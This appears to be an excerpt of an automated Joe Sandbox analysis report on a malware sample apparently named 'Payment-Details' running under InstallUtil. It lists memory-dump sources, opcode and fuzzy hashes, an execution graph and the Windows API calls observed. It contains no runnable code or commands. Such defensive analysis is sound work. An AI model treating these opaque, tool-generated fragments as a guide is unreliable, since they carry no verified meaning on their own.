                                        • Instruction Fuzzy Hash: 58C0927A140208EFC700DF69E848C85BBB8EF1977171180A1FA088B332C732EC60DA94
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4cd8da0282c8acc202f687b46a348a094e1bd0d699c4e4edccd3a58070e6655b
                                        • Instruction ID: 6fb886ddcfa79f56cae25f15881682da3bbff431ddd13bf46609683e64a36857
                                        • Opcode Fuzzy Hash: 4cd8da0282c8acc202f687b46a348a094e1bd0d699c4e4edccd3a58070e6655b
                                        • Instruction Fuzzy Hash: 2BB09232040208AB87019A84E804859BB6AAB58A20B54C025B609061118B32A822DB94
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: :
                                        • API String ID: 0-336475711
                                        • Opcode ID: 1b4a4e3b0fab632f8baece1822f562f0e081b0abe8981eabf309790a3f623159
                                        • Instruction ID: 4fc9116c4bfeb4e5894cdace46e14e4d7701f50f2ac244203af3ebf249a86a1a
                                        • Opcode Fuzzy Hash: 1b4a4e3b0fab632f8baece1822f562f0e081b0abe8981eabf309790a3f623159
                                        • Instruction Fuzzy Hash: 0B4120B1E14A188BEB58CF6B8C4469EFAF7AFC9301F14D1B9981CAA255EB7405428F11
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1692780172.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70e0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: !
                                        • API String ID: 0-2657877971
                                        • Opcode ID: 012bdc67f37d08e8ba89ac8b63dc7cf0727a391ae9ec8ee4347917cd695d9546
                                        • Instruction ID: 7b378271c30d2c35ab3d23d540b944a65ce678dd581aeed0f63231dd33c83a17
                                        • Opcode Fuzzy Hash: 012bdc67f37d08e8ba89ac8b63dc7cf0727a391ae9ec8ee4347917cd695d9546
                                        • Instruction Fuzzy Hash: DB3181B1D056558BE759CF6B8D4429EFBF7AFC9300F14C1BA8448A6264DB7409818F11
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1692780172.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70e0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: !
                                        • API String ID: 0-2657877971
                                        • Opcode ID: 0d37ebf837e376ea95e5be7ba6e0115ba4edda9f8aa4c333abe281a31bd20528
                                        • Instruction ID: b279d4f2d7bf9b3bb7be9675e0a767a408deb651498c0bf51e20f008a6e22c0e
                                        • Opcode Fuzzy Hash: 0d37ebf837e376ea95e5be7ba6e0115ba4edda9f8aa4c333abe281a31bd20528
                                        • Instruction Fuzzy Hash: 273191B1E156198BEB5CCF6B8D4469EFAF7AFC9300F14D5BA841CA6264DB700A818F11
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 95e4ebb1def65465d3c05fdab9e707a33d1b6a26402b6e12ddd85b44820ed6e1
                                        • Instruction ID: 6c231b07421bfd0df97f0cc057a9f8b21099a8825ff91bead923ff810f4a9d5c
                                        • Opcode Fuzzy Hash: 95e4ebb1def65465d3c05fdab9e707a33d1b6a26402b6e12ddd85b44820ed6e1
                                        • Instruction Fuzzy Hash: 97D106B4B10206CFDB14DF69C584AA9BBF6FF88314F658599E805AB362D734EC81CB50

                                        Execution Graph

                                        Execution Coverage:11.8%
                                        Dynamic/Decrypted Code Coverage:100%
                                        Signature Coverage:0%
                                        Total number of Nodes:88
                                        Total number of Limit Nodes:14
                                        execution_graph 40863 5c03b30 40864 5c03b76 GetCurrentProcess 40863->40864 40866 5c03bc1 40864->40866 40867 5c03bc8 GetCurrentThread 40864->40867 40866->40867 40868 5c03c05 GetCurrentProcess 40867->40868 40869 5c03bfe 40867->40869 40870 5c03c3b 40868->40870 40869->40868 40871 5c03c63 GetCurrentThreadId 40870->40871 40872 5c03c94 40871->40872 40873 5c0e210 40874 5c0e278 CreateWindowExW 40873->40874 40876 5c0e334 40874->40876 40877 2190848 40879 219084e 40877->40879 40878 219091b 40879->40878 40883 2191380 40879->40883 40887 5c02a18 40879->40887 40891 5c02a28 40879->40891 40885 2191383 40883->40885 40884 21914a6 40884->40879 40885->40884 40895 2198188 40885->40895 40888 5c02a28 40887->40888 40908 5c02144 40888->40908 40892 5c02a37 40891->40892 40893 5c02144 2 API calls 40892->40893 40894 5c02a58 40893->40894 40894->40879 40896 2198192 40895->40896 40897 21981ac 40896->40897 40900 5c7f729 40896->40900 40904 5c7f738 40896->40904 40897->40885 40901 5c7f74d 40900->40901 40902 5c7f95e 40901->40902 40903 5c7fd78 GlobalMemoryStatusEx GlobalMemoryStatusEx 40901->40903 40902->40897 40903->40901 40905 5c7f74d 40904->40905 40906 5c7f95e 40905->40906 40907 5c7fd78 GlobalMemoryStatusEx GlobalMemoryStatusEx 40905->40907 40906->40897 40907->40905 40909 5c0214f 40908->40909 40912 5c038b4 40909->40912 40911 5c043de 40913 5c038bf 40912->40913 40914 5c04b04 40913->40914 40917 5c06387 40913->40917 40921 5c06388 40913->40921 40914->40911 40918 5c063a9 40917->40918 40919 5c063cd 40918->40919 40925 5c06538 40918->40925 40919->40914 40923 5c063a9 40921->40923 40922 5c063cd 40922->40914 40923->40922 40924 5c06538 2 API calls 40923->40924 40924->40922 40926 5c06545 40925->40926 40927 5c0657e 40926->40927 40929 5c048c4 40926->40929 40927->40919 40930 5c048cf 40929->40930 40932 5c069f0 40930->40932 40933 5c048d4 40930->40933 40932->40932 40934 5c048df 40933->40934 40940 5c065b4 40934->40940 40936 5c06a5f 40944 5c0bd78 40936->40944 40950 5c0bd60 
40936->40950 40937 5c06a99 40937->40932 40943 5c065bf 40940->40943 40941 5c07ce8 40941->40936 40942 5c06388 2 API calls 40942->40941 40943->40941 40943->40942 40946 5c0bdf5 40944->40946 40947 5c0bda9 40944->40947 40945 5c0bdb5 40945->40937 40946->40937 40947->40945 40956 5c0bfe0 40947->40956 40960 5c0bff0 40947->40960 40952 5c0bda9 40950->40952 40953 5c0bdf5 40950->40953 40951 5c0bdb5 40951->40937 40952->40951 40954 5c0bfe0 2 API calls 40952->40954 40955 5c0bff0 2 API calls 40952->40955 40953->40937 40954->40953 40955->40953 40957 5c0bff0 40956->40957 40963 5c0c031 40957->40963 40958 5c0bffa 40958->40946 40962 5c0c031 2 API calls 40960->40962 40961 5c0bffa 40961->40946 40962->40961 40964 5c0c051 40963->40964 40965 5c0c074 40963->40965 40964->40965 40969 5c0c2c8 LoadLibraryExW 40964->40969 40970 5c0c2d8 LoadLibraryExW 40964->40970 40965->40958 40966 5c0c06c 40966->40965 40967 5c0c278 GetModuleHandleW 40966->40967 40968 5c0c2a5 40967->40968 40968->40958 40969->40966 40970->40966 40971 5c03d78 DuplicateHandle 40972 5c03e0e 40971->40972

                                        Control-flow Graph

                                        APIs
                                        • GetCurrentProcess.KERNEL32 ref: 05C03BAE
                                        • GetCurrentThread.KERNEL32 ref: 05C03BEB
                                        • GetCurrentProcess.KERNEL32 ref: 05C03C28
                                        • GetCurrentThreadId.KERNEL32 ref: 05C03C81
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2027180919.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_5c00000_InstallUtil.jbxd
                                        Similarity
                                        • API ID: Current$ProcessThread
                                        • String ID: 0`
                                        • API String ID: 2063062207-1002706549
                                        • Opcode ID: 0b6fe1e4bba91ecd2f4482d50c2845577787bb547f6524d9d49b8e73428f4e17
                                        • Instruction ID: dcce392c9d0224d5669775dc8245b4fd9fcc1dafbadee423a24d5757b7cb4216
                                        • Opcode Fuzzy Hash: 0b6fe1e4bba91ecd2f4482d50c2845577787bb547f6524d9d49b8e73428f4e17
                                        • Instruction Fuzzy Hash: DA5156B09003498FEB14DFAAD548B9EBBF1FF88714F208859E409A7390DB749944CF65

                                        Control-flow Graph

                                        APIs
                                        • GetCurrentProcess.KERNEL32 ref: 05C03BAE
                                        • GetCurrentThread.KERNEL32 ref: 05C03BEB
                                        • GetCurrentProcess.KERNEL32 ref: 05C03C28
                                        • GetCurrentThreadId.KERNEL32 ref: 05C03C81
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2027180919.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_5c00000_InstallUtil.jbxd
                                        Similarity
                                        • API ID: Current$ProcessThread
                                        • String ID: 0`
                                        • API String ID: 2063062207-1002706549
                                        • Opcode ID: 46135b94d0fc8fec51a4fb92c91b010ff04dcd9da7c1ff439d7c7f7494e372b4
                                        • Instruction ID: 64af9e1c19a6a6ca532a884e348b323ba9dfac9ceb86983fdebee539e61173c8
                                        • Opcode Fuzzy Hash: 46135b94d0fc8fec51a4fb92c91b010ff04dcd9da7c1ff439d7c7f7494e372b4
                                        • Instruction Fuzzy Hash: 485156B09003498FEB14DFAAD548B9EBBF1FF88714F208819E409A7390DB749944CF65

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1183 5c0c031-5c0c04f 1184 5c0c051-5c0c05e call 5c0b504 1183->1184 1185 5c0c07b-5c0c07f 1183->1185 1191 5c0c060 1184->1191 1192 5c0c074 1184->1192 1187 5c0c081-5c0c08b 1185->1187 1188 5c0c093-5c0c0d4 1185->1188 1187->1188 1194 5c0c0e1-5c0c0ef 1188->1194 1195 5c0c0d6-5c0c0de 1188->1195 1239 5c0c066 call 5c0c2c8 1191->1239 1240 5c0c066 call 5c0c2d8 1191->1240 1192->1185 1196 5c0c0f1-5c0c0f6 1194->1196 1197 5c0c113-5c0c115 1194->1197 1195->1194 1199 5c0c101 1196->1199 1200 5c0c0f8-5c0c0ff call 5c0b510 1196->1200 1202 5c0c118-5c0c11f 1197->1202 1198 5c0c06c-5c0c06e 1198->1192 1201 5c0c1b0-5c0c270 1198->1201 1204 5c0c103-5c0c111 1199->1204 1200->1204 1234 5c0c272-5c0c275 1201->1234 1235 5c0c278-5c0c2a3 GetModuleHandleW 1201->1235 1205 5c0c121-5c0c129 1202->1205 1206 5c0c12c-5c0c133 1202->1206 1204->1202 1205->1206 1209 5c0c140-5c0c149 call 5c04620 1206->1209 1210 5c0c135-5c0c13d 1206->1210 1214 5c0c156-5c0c15b 1209->1214 1215 5c0c14b-5c0c153 1209->1215 1210->1209 1216 5c0c179-5c0c186 1214->1216 1217 5c0c15d-5c0c164 1214->1217 1215->1214 1224 5c0c188-5c0c1a6 1216->1224 1225 5c0c1a9-5c0c1af 1216->1225 1217->1216 1219 5c0c166-5c0c176 call 5c09f10 call 5c0b520 1217->1219 1219->1216 1224->1225 1234->1235 1236 5c0c2a5-5c0c2ab 1235->1236 1237 5c0c2ac-5c0c2c0 1235->1237 1236->1237 1239->1198 1240->1198
                                        APIs
                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 05C0C296
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2027180919.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_5c00000_InstallUtil.jbxd
                                        Similarity
                                        • API ID: HandleModule
                                        • String ID:
                                        • API String ID: 4139908857-0

                                        Control-flow Graph: 219ec79-219ee05, includes a call to GlobalMemoryStatusEx (graph image not preserved)
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2015924635.0000000002190000.00000040.00000800.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_2190000_InstallUtil.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:

                                        APIs
                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05C0E322
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2027180919.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_5c00000_InstallUtil.jbxd
                                        Similarity
                                        • API ID: CreateWindow
                                        • String ID:
                                        • API String ID: 716092398-0

                                        APIs
                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05C0E322
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2027180919.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_5c00000_InstallUtil.jbxd
                                        Similarity
                                        • API ID: CreateWindow
                                        • String ID:
                                        • API String ID: 716092398-0

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2027712459.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_5c70000_InstallUtil.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $
                                        • API String ID: 0-3993045852

                                        APIs
                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 05C03DFF
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2027180919.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_5c00000_InstallUtil.jbxd
                                        Similarity
                                        • API ID: DuplicateHandle
                                        • String ID:
                                        • API String ID: 3793708945-0

                                        APIs
                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 05C03DFF
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2027180919.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_5c00000_InstallUtil.jbxd
                                        Similarity
                                        • API ID: DuplicateHandle
                                        • String ID:
                                        • API String ID: 3793708945-0

                                        APIs
                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,05C0C311,00000800,00000000,00000000), ref: 05C0C502
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2027180919.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_5c00000_InstallUtil.jbxd
                                        Similarity
                                        • API ID: LibraryLoad
                                        • String ID:
                                        • API String ID: 1029625771-0

                                        APIs
                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,05C0C311,00000800,00000000,00000000), ref: 05C0C502
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2027180919.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_5c00000_InstallUtil.jbxd
                                        Similarity
                                        • API ID: LibraryLoad
                                        • String ID:
                                        • API String ID: 1029625771-0

                                        APIs
                                        • GlobalMemoryStatusEx.KERNELBASE ref: 0219EDC7
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2015924635.0000000002190000.00000040.00000800.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_2190000_InstallUtil.jbxd
                                        Similarity
                                        • API ID: GlobalMemoryStatus
                                        • String ID:
                                        • API String ID: 1890195054-0
                                        APIs
                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 05C0C296
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2027180919.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_5c00000_InstallUtil.jbxd
                                        Similarity
                                        • API ID: HandleModule
                                        • String ID:
                                        • API String ID: 4139908857-0
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2027712459.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_5c70000_InstallUtil.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2752b8fce4a10b708223a18bc089a73f31adce1018536a49783b8bcba6231df9
                                        • Instruction ID: a74d15b95a26b10e77ecc0f8a6f6cfd4eb4578aa18460b59c85bb5248e764550
                                        • Opcode Fuzzy Hash: 2752b8fce4a10b708223a18bc089a73f31adce1018536a49783b8bcba6231df9
                                        • Instruction Fuzzy Hash: 19716B30B00219DFDB14DB64D888AADB7F2FF84311F248955E916AB795DB31ED82CB90
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2027712459.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_5c70000_InstallUtil.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7d39d348ef91548e99304797d38c67ecdb0c4d7e61468641e9581caace2162c5
                                        • Instruction ID: fd0ff6940192618b7a7349c257dc19fd6e0471294af99d5b269f6127edb3a5f9
                                        • Opcode Fuzzy Hash: 7d39d348ef91548e99304797d38c67ecdb0c4d7e61468641e9581caace2162c5
                                        • Instruction Fuzzy Hash: 0E616130B002199FEF149BA9C8557AEBBB6FF88710F208429E106EB391DB759D418B91
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2027712459.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_5c70000_InstallUtil.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f637e1eee79ad5760d38ab69e04a26461bf138acf1b2daf2b03bf879a7973b70
                                        • Instruction ID: 580f61771b0d54848e84cb4ed74b8c22c31671a8bdfdd87d967d8c94b5e85608
                                        • Opcode Fuzzy Hash: f637e1eee79ad5760d38ab69e04a26461bf138acf1b2daf2b03bf879a7973b70
                                        • Instruction Fuzzy Hash: 1051CE35A002099FDF14EFB8E894AAEBBB2FB85311F108C6DE016D7650DF359A45CB81
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2027712459.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_5c70000_InstallUtil.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a3a938bf34290cce321f1b2e56c43316ba8619f60dc91101a8fa50904a71ae7f
                                        • Instruction ID: e5e64097ca346a8975b0cc3a7577d47ec75834cbab56033311d767cc7a48a840
                                        • Opcode Fuzzy Hash: a3a938bf34290cce321f1b2e56c43316ba8619f60dc91101a8fa50904a71ae7f
                                        • Instruction Fuzzy Hash: CB516274A0020E8FDF20CBA8D480EBEFBB2FB45310F648D26E559DB691D635D981CB91
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2027712459.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_5c70000_InstallUtil.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 78ada0a379274964167a1ab891c6392c42d8e1aeab3416f5566afcbff8cc377e
                                        • Instruction ID: 551314090ccd02da6023b570365372262ab6346806300faee89f888dab74657c
                                        • Opcode Fuzzy Hash: 78ada0a379274964167a1ab891c6392c42d8e1aeab3416f5566afcbff8cc377e
                                        • Instruction Fuzzy Hash: 6F5194307002089BEF24666CD8D4B7F6A6BFB89751F20482EE40AC7795CF69CD459792
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2027712459.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_5c70000_InstallUtil.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 208221c4a2ca77634217e591990a9a648596f0767e4d5c5081c62315f70041f4
                                        • Instruction ID: 791b15c46992ba949d9b2198b734f43abe79a8bd9d5e5f10491fbe73a767ba53
                                        • Opcode Fuzzy Hash: 208221c4a2ca77634217e591990a9a648596f0767e4d5c5081c62315f70041f4
                                        • Instruction Fuzzy Hash: E351A2307002089BEF24666CD8D4B3F6A6FF789761F20482EE40AC7795DF69CD4597A2
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2027712459.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_5c70000_InstallUtil.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b30f249a17baae6945790649fed3aabcd825f97242adea9927670e54851d7249
                                        • Instruction ID: fd28dd229ce0ae61aeedf3d877b8d42308231b0e9b9663d83436dc7c20c78c90
                                        • Opcode Fuzzy Hash: b30f249a17baae6945790649fed3aabcd825f97242adea9927670e54851d7249
                                        • Instruction Fuzzy Hash: 4C514E31B117198FDB14EB68D480AAEB7B6FF88315F108968E805AB355DB31ED01CB90
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2027712459.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_5c70000_InstallUtil.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8281e0beb874b726a7ad0e89a98a5d7168ba2423d6b0b9d0cffaf0a566947dbd
                                        • Instruction ID: 7d2e3c6c22f27a58865012205280cc69eadf6a91858efe2e416a77519c6e5087
                                        • Opcode Fuzzy Hash: 8281e0beb874b726a7ad0e89a98a5d7168ba2423d6b0b9d0cffaf0a566947dbd
                                        • Instruction Fuzzy Hash: 95512130B0010A9FDB54EB68D890B6E77F6EF88750F14896AC905E7754EB31DD019BA1
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2027712459.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_5c70000_InstallUtil.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a91b6b146629e3030743336b9d8e6665cbbd2d97c847bcd2367c0c2d5e0c93cf
                                        • Instruction ID: b65fb94ce70ea7b85f7db03a4e728cb9bec70fb452a246f5d9ce2a592e5ddab3
                                        • Opcode Fuzzy Hash: a91b6b146629e3030743336b9d8e6665cbbd2d97c847bcd2367c0c2d5e0c93cf
                                        • Instruction Fuzzy Hash: 8B518230B002189FEF149FA5C8557AEBBB6FF88700F208529E506EB395DB759D01CB91
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2027712459.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_5c70000_InstallUtil.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 189b7daf3443a9f3a1aa705684e1876f4028fdc5b986b27e27fc05321d6c2f6b
                                        • Instruction ID: 150f9a4f6886a6c3d59ac07ac16ca3f6097328025e7dc8a7fd59527890a35ad1
                                        • Opcode Fuzzy Hash: 189b7daf3443a9f3a1aa705684e1876f4028fdc5b986b27e27fc05321d6c2f6b
                                        • Instruction Fuzzy Hash: E9413071F006098FDF30CEA9D881ABFF7B2FB94211F104D2AE156D7A50E774A9458B91
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2027712459.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_5c70000_InstallUtil.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 99f2b7e823af3946e35cee72c5eb363cdc781d464d358ec441a524b5f05cfe0e
                                        • Instruction ID: 6ab7335349065d0ca04e9f48ea7b181640ddbfbebe2caaa7d8ba2529026e4e2b
                                        • Opcode Fuzzy Hash: 99f2b7e823af3946e35cee72c5eb363cdc781d464d358ec441a524b5f05cfe0e
                                        • Instruction Fuzzy Hash: 7941A470A0070ECBDB25DF65D85476EBBB3BF85300F204929D403EB640DB75AA46CB91
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2027712459.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_5c70000_InstallUtil.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 40a63c8dc796df362f4014c8c5f380b60ff74f3b072c10eb2970501a34b87c31
                                        • Instruction ID: fe1d63993e3f2054a444d594337594c3c697dc1f371e0f13c297e2dc1882e320
                                        • Opcode Fuzzy Hash: 40a63c8dc796df362f4014c8c5f380b60ff74f3b072c10eb2970501a34b87c31
                                        • Instruction Fuzzy Hash: A531DE34B0020A8BDB1A9B78C95466F7BA7FF85610F244868D846EB395EF31CD02CB91
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2027712459.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_5c70000_InstallUtil.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b83f4c2e5ee67a5e931af62f8db53ca20a971fa8aa7368fb58662b50116f494f
                                        • Instruction ID: e0a6de991179dfd1b02e7f98d6c8c6756484eef2c8a78f0e700f7dbca901a2e9
                                        • Opcode Fuzzy Hash: b83f4c2e5ee67a5e931af62f8db53ca20a971fa8aa7368fb58662b50116f494f
                                        • Instruction Fuzzy Hash: 4E31A13470020A8BDB19AB78C95466F7BA7FF85750F248928D806EB395DF31DD028BA1
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2027712459.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_5c70000_InstallUtil.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 929f61db7b0a5953cff6fa554b5ee2ce8689fbd8d3dc286c8c56e6cf93eaff5a
                                        • Instruction ID: 05a0143e9f770bed40ea9fcd8bea39f60b6171a9324ac82624ec68ac71ddc66e
                                        • Opcode Fuzzy Hash: 929f61db7b0a5953cff6fa554b5ee2ce8689fbd8d3dc286c8c56e6cf93eaff5a
                                        • Instruction Fuzzy Hash: 4231B235F106099BCB15DF64D894AAEBBF2FF89300F148969E806EB740DB70AC42CB50
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2027712459.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_5c70000_InstallUtil.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a2d4e2c55151c8dec69ed5a15f34352bd98045b71e7b22c116b442fe0fbd7cc6
                                        • Instruction ID: 4175415aad8fe73a7e3689b406c7ceb5387fdb44b0cad5055e37402f044a73d6
                                        • Opcode Fuzzy Hash: a2d4e2c55151c8dec69ed5a15f34352bd98045b71e7b22c116b442fe0fbd7cc6
                                        • Instruction Fuzzy Hash: 36318931A1071D8BDB15DF68D580A9EBBB2FF85310F144969E406EB714D770A945C741
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2027712459.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_5c70000_InstallUtil.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a2a8912f0d181688f989eccc0add2c7a0c96bc033b07c1a242431b9d6ba4a382
